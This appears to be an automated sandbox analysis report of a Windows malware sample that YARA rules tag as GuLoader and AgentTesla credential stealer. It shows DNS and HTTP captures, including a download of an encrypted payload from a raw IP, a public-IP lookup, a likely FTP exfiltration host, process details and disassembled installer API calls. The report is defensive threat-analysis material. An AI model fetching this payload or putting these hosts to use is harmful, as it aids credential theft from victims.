Oct 31, 2024 11:45:31.621936083 CET	55487	53	192.168.2.4	1.1.1.1
Oct 31, 2024 11:45:31.937545061 CET	53	55487	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 31, 2024 11:45:30.010555983 CET	192.168.2.4	1.1.1.1	0x2a13	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Oct 31, 2024 11:45:31.621936083 CET	192.168.2.4	1.1.1.1	0x660a	Standard query (0)	ftp.concaribe.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 31, 2024 11:45:30.019054890 CET	1.1.1.1	192.168.2.4	0x2a13	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Oct 31, 2024 11:45:30.019054890 CET	1.1.1.1	192.168.2.4	0x2a13	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Oct 31, 2024 11:45:30.019054890 CET	1.1.1.1	192.168.2.4	0x2a13	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Oct 31, 2024 11:45:31.937545061 CET	1.1.1.1	192.168.2.4	0x660a	No error (0)	ftp.concaribe.com	concaribe.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 11:45:31.937545061 CET	1.1.1.1	192.168.2.4	0x660a	No error (0)	concaribe.com		192.185.13.234	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

84.38.133.42

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	62115	84.38.133.42	80	7880	C:\Users\user\Desktop\u9aPQQIwhj.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 11:45:26.576579094 CET	185	OUT	GET /SaclKvrenGmYaqCeKqHVn198.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: 84.38.133.42 Cache-Control: no-cache
Oct 31, 2024 11:45:28.117253065 CET	1236	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Thu, 31 Oct 2024 07:57:53 GMT Accept-Ranges: bytes ETag: "b16ac1966a2bdb1:0" Server: Microsoft-IIS/8.5 Date: Thu, 31 Oct 2024 10:45:25 GMT Content-Length: 241728 Data Raw: ed 3c c1 36 f9 46 c2 80 55 d0 29 fb 6d 4b b2 79 84 36 2f 0f c9 40 b4 ac b7 65 57 4a e5 aa 1f 78 e7 f4 f4 c1 09 70 51 09 b3 0c 71 03 8c b9 00 d8 12 d0 35 92 2c 17 6a 7e fc f7 7e ae 1e 75 96 6a 33 c4 69 38 54 4d c3 80 d3 1c f9 61 bc 89 b9 f6 43 11 c5 28 28 d8 f4 14 2e ca 0f 7c 00 cd e0 a4 71 74 7d e5 62 31 b7 2f 53 e5 86 50 e3 e4 57 23 d3 dd 90 6f 9d 62 79 0c d7 23 ae 44 5b 4a dd a2 50 19 05 61 0e e2 34 4b 92 1a e3 f0 31 44 64 d5 9a 85 a9 66 ac 16 72 e2 68 78 36 c1 a5 a8 8a 96 55 74 22 28 c7 48 b9 f3 b5 ff c9 e7 d1 c7 0d ce f6 c3 ac 37 ed 67 46 00 37 40 f1 00 74 5f 28 57 7b 3c f7 6f 5e 4a e4 45 1f fd 95 1e 9c c8 a7 a6 8a eb b1 ae e2 68 87 12 e7 ba 30 e0 cf 09 df 55 a4 c4 cb 61 f2 1d 29 3a dc 2d 20 6d c2 b9 1b 97 cb a2 64 1f c2 e5 75 6c 52 d2 47 86 62 51 29 6e 04 5c b8 ba ec f7 99 30 ed 3a 95 fc a4 17 0c 76 79 7d ef 3f 13 54 da 06 8f 3a ab 4d 09 e1 56 c7 90 82 f2 08 6d 9f 82 40 fb c1 4d ba 81 0a bd 26 28 1f d7 00 2b 15 76 a9 86 60 6d 34 ba 5c 1d 5e c5 30 7a 86 3f 14 6a e9 ae 01 25 2e e0 2a 0d 85 92 19 [TRUNCATED] Data Ascii: <6FU)mKy6/@eWJxpQq5,j~~uj3i8TMaC((.\|qt}b1/SPW#oby#D[JPa4K1Ddfrhx6Ut"(H7gF7@t_(W{<o^JEh0Ua):- mdulRGbQ)n\0:vy}?T:MVm@M&(+v`m4\^0z?j%.zX}JLf]=h9%}l;G.9K)t4b&U@UfN]My^W;YP7\(C]g"` 7[\|efg-P+.MCD't`8Xqi#\+-lu_$fu9 ]pf1N\|l}[qPa]eG-3oW]3IRtL{@w[b$pTZ5m~lpp}BU)/}6v[>t;+P%gS#S8]jNWXo=09gsELb=7su1<mTie==dv]hW023E7_(lX+*s?&O1<#J2N]V"IW5wg+6VgG64(j`W'laK{W2cm$JHLH-N'J-`fG55]Pp.
Oct 31, 2024 11:45:28.117310047 CET	1236	IN	Data Raw: 9a 77 16 d0 84 c2 46 87 b4 63 47 0e 94 b6 f9 30 87 45 17 d7 e7 ae 1a 5a e3 fc fe 44 a0 9f fa 75 ba 34 c6 a3 4a 7a a5 d6 e3 19 7c 01 60 68 ae ca c5 c6 20 2b 5b 0a 61 86 b2 c6 7a 71 e7 6e 78 c2 e7 5f 95 f1 21 7c 29 6f d3 d5 8e d3 61 de e9 e4 b3 17 Data Ascii: wFcG0EZDu4Jz\|`h +[azqnx_!\|)oa*KjzCCR>BPn9Y<K{f0<SXY[KV~Y_bKuQ]7PKNft;6!/Dt'uoJ\|Vm~} Uiy
Oct 31, 2024 11:45:28.117352009 CET	424	IN	Data Raw: 08 1f fe ca 50 42 1e 3d ea 26 69 7a eb 34 b3 a3 07 17 b6 36 b6 f2 c1 20 4c 47 42 11 e9 40 4d 21 f1 2c b3 0c 53 1a b7 84 d3 4f ab 24 37 5b 29 e6 2a f0 f2 03 bb d9 5a cc 82 0a 0d 24 bd fe 73 41 e4 a9 38 0b 4a 70 3c 63 9d c8 68 94 06 4f 80 6b 5d b1 Data Ascii: PB=&iz46 LGB@M!,SO$7[)*Z$sA8Jp<chOk]+T"}kT`c/T~\|v3atd{XRh#\gis-;Jx/^y<=kpEqV36{Q.
Oct 31, 2024 11:45:28.117386103 CET	1236	IN	Data Raw: d4 55 99 be e4 41 82 a0 39 b4 c7 51 cd c2 64 01 0d c2 9f 52 f3 97 b2 2d 25 ec 9d b2 71 8a 6f 4d c9 2a 31 2e 75 d0 9e 00 ae c8 b7 64 b0 75 7a 22 f7 6a c8 94 54 74 28 4f 54 7e 56 74 51 c1 8d fb 6b 67 f8 fc 89 38 60 76 b7 9e 81 02 2c 52 ce 7d 9c 01 Data Ascii: UA9QdR-%qoM*1.uduz"jTt(OT~VtQkg8`v,R}&+v!u02v8V@6xo-)di`?aL6El;2Wl24#)7@us`NSYZgH#43
Oct 31, 2024 11:45:28.117435932 CET	1236	IN	Data Raw: e1 02 98 c8 65 f8 32 70 fa b9 4f 5e 15 75 8b 5e 7e 02 cf e0 e3 b6 45 80 98 c6 e9 6a 5b 7f 94 99 e7 69 93 c6 96 3a 5c 9f 32 cf 88 42 e6 8f 50 b0 43 85 41 fb 50 42 2f c8 7a 01 ee 3c e4 c5 69 bf 94 fd 73 89 50 c9 fe 17 df 34 eb 3e 07 c7 f7 38 2e 0d Data Ascii: e2pO^u^~Ej[i:\2BPCAPB/z<isP4>8.m~YOVw[sywS/?1B^4\{#/j@Qu9HoJ9\|V+P!zx#7#\|wK~LP/%q,7CL+x_V@}v5z
Oct 31, 2024 11:45:28.117469072 CET	424	IN	Data Raw: a6 b2 05 2b 25 4c 95 13 79 69 f6 81 26 0f 11 eb 3c 63 99 1c 44 94 05 32 e7 67 5f b5 21 e1 56 ab b7 6e 23 9c a9 7c 8e 49 a4 04 ab 19 fd d9 78 44 85 04 75 9c e6 c7 67 0b 0f f8 0b 6a f8 dd ae 92 c4 d1 a2 fc 06 bd bb af db 39 06 68 22 24 99 67 ee 7c Data Ascii: +%Lyi&<cD2g_!Vn#\|IxDugj9h"$g\|aVgU.j!I,*e=aC;h?D@.0;kZ>4{Vrh)n_I<LiKno1.M?`Th1ZY
Oct 31, 2024 11:45:28.117496967 CET	424	IN	Data Raw: a6 b2 05 2b 25 4c 95 13 79 69 f6 81 26 0f 11 eb 3c 63 99 1c 44 94 05 32 e7 67 5f b5 21 e1 56 ab b7 6e 23 9c a9 7c 8e 49 a4 04 ab 19 fd d9 78 44 85 04 75 9c e6 c7 67 0b 0f f8 0b 6a f8 dd ae 92 c4 d1 a2 fc 06 bd bb af db 39 06 68 22 24 99 67 ee 7c Data Ascii: +%Lyi&<cD2g_!Vn#\|IxDugj9h"$g\|aVgU.j!I,*e=aC;h?D@.0;kZ>4{Vrh)n_I<LiKno1.M?`Th1ZY
Oct 31, 2024 11:45:28.117528915 CET	1236	IN	Data Raw: 0a 35 f2 7e 56 0e 7e e3 8f fc 64 c8 f8 fc fd 60 73 74 cc 49 ee 17 28 78 e6 dd 61 70 82 0b d8 ba ab 8e 29 a9 cf 21 87 a2 fd 3b 9d 30 6b 9d 31 1a e4 5c 9d ec 43 ff d3 55 4a b3 38 2a 38 01 c6 dd 38 08 29 8b ce 45 7b d0 e6 b9 dc f5 b8 a7 39 c7 60 95 Data Ascii: 5~V~d`stI(xap)!;0k1\CUJ8*88)E{9`Ic@XMq5sd7(j="+Qdgn68%TeE?[s<fm{9Zs}}BfAg8i;``=WmCvT(n4\|ott]b1] A
Oct 31, 2024 11:45:28.117579937 CET	1236	IN	Data Raw: cf c6 02 59 11 30 e2 ef 0c 0e bf e3 77 d3 90 cb fe 61 dd 78 e9 16 2a b8 d9 3f 2c 0a 26 55 82 7e af aa 4b a6 f7 a9 66 ae ab e9 37 72 5a 5b 27 ea 77 c9 50 af 9d 0f 9e 17 03 f8 54 8b c6 3b b1 20 93 ab 29 c8 ac ed df 22 ff ba 15 e1 e5 d1 f2 84 bc f4 Data Ascii: Y0wax?,&U~Kf7rZ['wPT; )"@^U>\t;`L+T[5l++vx-[_J=`TKfS9kpyPj{4\|\|~p0X,!_Az2jFCD
Oct 31, 2024 11:45:28.117613077 CET	1236	IN	Data Raw: 67 d5 01 fb 0b 4a 14 dc 97 97 3a d0 9b d7 03 bd bb d1 eb 26 f9 93 e4 45 81 57 eb 5c c9 c7 00 a8 f3 a6 62 fb 8c 49 5a 19 67 26 c2 52 a1 16 30 bd 53 b0 c6 09 1c cd 2e 69 83 9f 40 19 d4 64 05 52 6f 42 19 ba 0a 3b 16 ae 01 aa 0c 07 d0 60 7e 17 d7 a0 Data Ascii: gJ:&EW\bIZg&R0S.i@dRoB;`~JX/Q>kZh<5XU4KtVpH]^*8vN_g^\|ATrsd[,CS@TH3Y8eqw5b#3,G[KyW~Y{IwrU
Oct 31, 2024 11:45:28.117645025 CET	1236	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Thu, 31 Oct 2024 07:57:53 GMT Accept-Ranges: bytes ETag: "b16ac1966a2bdb1:0" Server: Microsoft-IIS/8.5 Date: Thu, 31 Oct 2024 10:45:25 GMT Content-Length: 241728 Data Raw: ed 3c c1 36 f9 46 c2 80 55 d0 29 fb 6d 4b b2 79 84 36 2f 0f c9 40 b4 ac b7 65 57 4a e5 aa 1f 78 e7 f4 f4 c1 09 70 51 09 b3 0c 71 03 8c b9 00 d8 12 d0 35 92 2c 17 6a 7e fc f7 7e ae 1e 75 96 6a 33 c4 69 38 54 4d c3 80 d3 1c f9 61 bc 89 b9 f6 43 11 c5 28 28 d8 f4 14 2e ca 0f 7c 00 cd e0 a4 71 74 7d e5 62 31 b7 2f 53 e5 86 50 e3 e4 57 23 d3 dd 90 6f 9d 62 79 0c d7 23 ae 44 5b 4a dd a2 50 19 05 61 0e e2 34 4b 92 1a e3 f0 31 44 64 d5 9a 85 a9 66 ac 16 72 e2 68 78 36 c1 a5 a8 8a 96 55 74 22 28 c7 48 b9 f3 b5 ff c9 e7 d1 c7 0d ce f6 c3 ac 37 ed 67 46 00 37 40 f1 00 74 5f 28 57 7b 3c f7 6f 5e 4a e4 45 1f fd 95 1e 9c c8 a7 a6 8a eb b1 ae e2 68 87 12 e7 ba 30 e0 cf 09 df 55 a4 c4 cb 61 f2 1d 29 3a dc 2d 20 6d c2 b9 1b 97 cb a2 64 1f c2 e5 75 6c 52 d2 47 86 62 51 29 6e 04 5c b8 ba ec f7 99 30 ed 3a 95 fc a4 17 0c 76 79 7d ef 3f 13 54 da 06 8f 3a ab 4d 09 e1 56 c7 90 82 f2 08 6d 9f 82 40 fb c1 4d ba 81 0a bd 26 28 1f d7 00 2b 15 76 a9 86 60 6d 34 ba 5c 1d 5e c5 30 7a 86 3f 14 6a e9 ae 01 25 2e e0 2a 0d 85 92 19 [TRUNCATED] Data Ascii: <6FU)mKy6/@eWJxpQq5,j~~uj3i8TMaC((.\|qt}b1/SPW#oby#D[JPa4K1Ddfrhx6Ut"(H7gF7@t_(W{<o^JEh0Ua):- mdulRGbQ)n\0:vy}?T:MVm@M&(+v`m4\^0z?j%.zX}JLf]=h9%}l;G.9K)t4b&U@UfN]My^W;YP7\(C]g"` 7[\|efg-P+.MCD't`8Xqi#\+-lu_$fu9 ]pf1N\|l}[qPa]eG-3oW]3IRtL{@w[b$pTZ5m~lpp}BU)/}6v[>t;+P%gS#S8]jNWXo=09gsELb=7su1<mTie==dv]hW023E7_(lX+*s?&O1<#J2N]V"IW5wg+6VgG64(j`W'laK{W2cm$JHLH-N'J-`fG55]Pp.
Oct 31, 2024 11:45:28.117906094 CET	1236	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Thu, 31 Oct 2024 07:57:53 GMT Accept-Ranges: bytes ETag: "b16ac1966a2bdb1:0" Server: Microsoft-IIS/8.5 Date: Thu, 31 Oct 2024 10:45:25 GMT Content-Length: 241728 Data Raw: ed 3c c1 36 f9 46 c2 80 55 d0 29 fb 6d 4b b2 79 84 36 2f 0f c9 40 b4 ac b7 65 57 4a e5 aa 1f 78 e7 f4 f4 c1 09 70 51 09 b3 0c 71 03 8c b9 00 d8 12 d0 35 92 2c 17 6a 7e fc f7 7e ae 1e 75 96 6a 33 c4 69 38 54 4d c3 80 d3 1c f9 61 bc 89 b9 f6 43 11 c5 28 28 d8 f4 14 2e ca 0f 7c 00 cd e0 a4 71 74 7d e5 62 31 b7 2f 53 e5 86 50 e3 e4 57 23 d3 dd 90 6f 9d 62 79 0c d7 23 ae 44 5b 4a dd a2 50 19 05 61 0e e2 34 4b 92 1a e3 f0 31 44 64 d5 9a 85 a9 66 ac 16 72 e2 68 78 36 c1 a5 a8 8a 96 55 74 22 28 c7 48 b9 f3 b5 ff c9 e7 d1 c7 0d ce f6 c3 ac 37 ed 67 46 00 37 40 f1 00 74 5f 28 57 7b 3c f7 6f 5e 4a e4 45 1f fd 95 1e 9c c8 a7 a6 8a eb b1 ae e2 68 87 12 e7 ba 30 e0 cf 09 df 55 a4 c4 cb 61 f2 1d 29 3a dc 2d 20 6d c2 b9 1b 97 cb a2 64 1f c2 e5 75 6c 52 d2 47 86 62 51 29 6e 04 5c b8 ba ec f7 99 30 ed 3a 95 fc a4 17 0c 76 79 7d ef 3f 13 54 da 06 8f 3a ab 4d 09 e1 56 c7 90 82 f2 08 6d 9f 82 40 fb c1 4d ba 81 0a bd 26 28 1f d7 00 2b 15 76 a9 86 60 6d 34 ba 5c 1d 5e c5 30 7a 86 3f 14 6a e9 ae 01 25 2e e0 2a 0d 85 92 19 [TRUNCATED] Data Ascii: <6FU)mKy6/@eWJxpQq5,j~~uj3i8TMaC((.\|qt}b1/SPW#oby#D[JPa4K1Ddfrhx6Ut"(H7gF7@t_(W{<o^JEh0Ua):- mdulRGbQ)n\0:vy}?T:MVm@M&(+v`m4\^0z?j%.zX}JLf]=h9%}l;G.9K)t4b&U@UfN]My^W;YP7\(C]g"` 7[\|efg-P+.MCD't`8Xqi#\+-lu_$fu9 ]pf1N\|l}[qPa]eG-3oW]3IRtL{@w[b$pTZ5m~lpp}BU)/}6v[>t;+P%gS#S8]jNWXo=09gsELb=7su1<mTie==dv]hW023E7_(lX+*s?&O1<#J2N]V"IW5wg+6VgG64(j`W'laK{W2cm$JHLH-N'J-`fG55]Pp.
Oct 31, 2024 11:45:28.125927925 CET	1236	IN	Data Raw: 9d 4c bc 7e 48 2c f6 a5 90 1d ae 93 e1 17 e7 28 a3 b7 df da d5 cd 16 a4 d3 4a 7e e7 b2 5e e5 7b e6 b5 a9 02 24 42 c0 77 9d e4 82 8e 31 12 6f 30 22 f6 1e f5 df 85 c4 02 5d ff 54 96 16 8b 36 1c cc 80 b6 b5 70 ec cb 80 1c e2 12 9d 25 f2 3b dc c8 53 Data Ascii: L~H,(J~^{$Bw1o0"]T6p%;S=G0^>DPd<3jW.6$7_(X+TkJc&w<gJL8k])V=xM$Jyubg+S$V\|eVRjh

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	62131	172.67.74.152	443	7880	C:\Users\user\Desktop\u9aPQQIwhj.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 10:45:30 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-10-31 10:45:30 UTC	211	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 10:45:30 GMT Content-Type: text/plain Content-Length: 14 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8db30e534bbd6b88-DFW
2024-10-31 10:45:30 UTC	14	IN	Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 Data Ascii: 173.254.250.77

Target ID:	0
Start time:	06:43:58
Start date:	31/10/2024
Path:	C:\Users\user\Desktop\u9aPQQIwhj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\u9aPQQIwhj.exe"
Imagebase:	0x400000
File size:	749'170 bytes
MD5 hash:	8B6B09811835191F99D4E2E9D94D232C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2410860650.0000000005FBA000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	06:45:13
Start date:	31/10/2024
Path:	C:\Users\user\Desktop\u9aPQQIwhj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\u9aPQQIwhj.exe"
Imagebase:	0x400000
File size:	749'170 bytes
MD5 hash:	8B6B09811835191F99D4E2E9D94D232C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2936520542.0000000035FDB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2936520542.0000000035FB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2936520542.0000000035FB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	19.9%
Dynamic/Decrypted Code Coverage:	15.2%
Signature Coverage:	20.9%
Total number of Nodes:	1510
Total number of Limit Nodes:	43

Executed Functions

Function 00403358 Relevance: 75.6, APIs: 27, Strings: 16, Instructions: 335
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 00403377
SetErrorMode.KERNELBASE(00008001), ref: 00403382
OleInitialize.OLE32(00000000), ref: 00403389

Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
Part of subcall function 00406252: LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280

SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B1

Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5

GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C6
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\u9aPQQIwhj.exe",00000000), ref: 004033D9
CharNextW.USER32(00000000,"C:\Users\user\Desktop\u9aPQQIwhj.exe",00000020), ref: 00403400
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403509
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040351A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403526
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040353A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403542
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403553
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040355B
DeleteFileW.KERNELBASE(1033), ref: 0040356F
OleUninitialize.OLE32(?), ref: 0040361F
ExitProcess.KERNEL32 ref: 0040363F
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\u9aPQQIwhj.exe",00000000,?), ref: 0040364B
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\u9aPQQIwhj.exe",00000000,?), ref: 00403657
CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403663
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040366A
DeleteFileW.KERNEL32(0041FE90,0041FE90,?,0042A000,?), ref: 004036C4
CopyFileW.KERNEL32(C:\Users\user\Desktop\u9aPQQIwhj.exe,0041FE90,?), ref: 004036D8
CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403705
GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375B
ExitWindowsEx.USER32(00000002,00000000), ref: 00403797
ExitProcess.KERNEL32 ref: 004037BA

Strings

C:\Users\user\Desktop\u9aPQQIwhj.exe, xrefs: 004036D3
C:\Users\user\Desktop, xrefs: 00403650, 00403655, 00403679
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040336B
"C:\Users\user\Desktop\u9aPQQIwhj.exe", xrefs: 004033CC, 004033D2, 00403593
C:\Users\user\Uploadable\normallnnens\Trskelen, xrefs: 004035FC
TMP, xrefs: 00403556
Error launching installer, xrefs: 004035D6
~nsu.tmp, xrefs: 00403645
C:\Users\user\Uploadable\normallnnens, xrefs: 004034EE, 004035F1, 00403670, 0040367A
TEMP, xrefs: 0040354E
NSIS Error, xrefs: 004033B7
Low, xrefs: 0040353C
\Temp, xrefs: 00403520
SeShutdownPrivilege, xrefs: 0040376D
C:\Users\user\AppData\Local\Temp\, xrefs: 004034FE, 00403503, 00403519, 00403525, 00403534, 00403541, 0040354D, 00403555, 0040364A, 00403656, 00403662, 00403669, 0040371A
1033, xrefs: 0040356A

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
String ID: "C:\Users\user\Desktop\u9aPQQIwhj.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\u9aPQQIwhj.exe$C:\Users\user\Uploadable\normallnnens$C:\Users\user\Uploadable\normallnnens\Trskelen$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
API String ID: 4107622049-648187735
Opcode ID: a3fc4b19b007463ca7c8d179c052c8cc71bf452235c419b64912ac856f47fe19
Instruction ID: d10961c3cf085e12fbe59355e5df5276e8fc63a686dc482ac58f4e9f7edec25e
Opcode Fuzzy Hash: a3fc4b19b007463ca7c8d179c052c8cc71bf452235c419b64912ac856f47fe19
Instruction Fuzzy Hash: 8CB1E070904211AAD720BF629D49A3B3EACEB45706F40453FF542B62E2D77C5A41CB7E

Function 004052D1 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00405330
GetDlgItem.USER32(?,000003EE), ref: 0040533F
GetClientRect.USER32(?,?), ref: 0040537C
GetSystemMetrics.USER32(00000015), ref: 00405384
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A5
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B6
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053C9
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D7
SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EA
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540C
ShowWindow.USER32(?,00000008), ref: 00405420
GetDlgItem.USER32(?,000003EC), ref: 00405441
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405451
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546A
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405476
GetDlgItem.USER32(?,000003F8), ref: 0040534E

Part of subcall function 00404162: SendMessageW.USER32(00000028,?,?,00403F8E), ref: 00404170

GetDlgItem.USER32(?,000003EC), ref: 00405493
CreateThread.KERNELBASE(00000000,00000000,Function_00005265,00000000), ref: 004054A1
CloseHandle.KERNELBASE(00000000), ref: 004054A8
ShowWindow.USER32(00000000), ref: 004054CC
ShowWindow.USER32(?,00000008), ref: 004054D1
ShowWindow.USER32(00000008), ref: 0040551B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040554F
CreatePopupMenu.USER32 ref: 00405560
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405574
GetWindowRect.USER32(?,?), ref: 00405594
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AD
SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E5
OpenClipboard.USER32(00000000), ref: 004055F5
EmptyClipboard.USER32 ref: 004055FB
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405607
GlobalLock.KERNEL32(00000000), ref: 00405611
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405625
GlobalUnlock.KERNEL32(00000000), ref: 00405645
SetClipboardData.USER32(0000000D,00000000), ref: 00405650
CloseClipboard.USER32 ref: 00405656

Strings

{, xrefs: 00405539

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

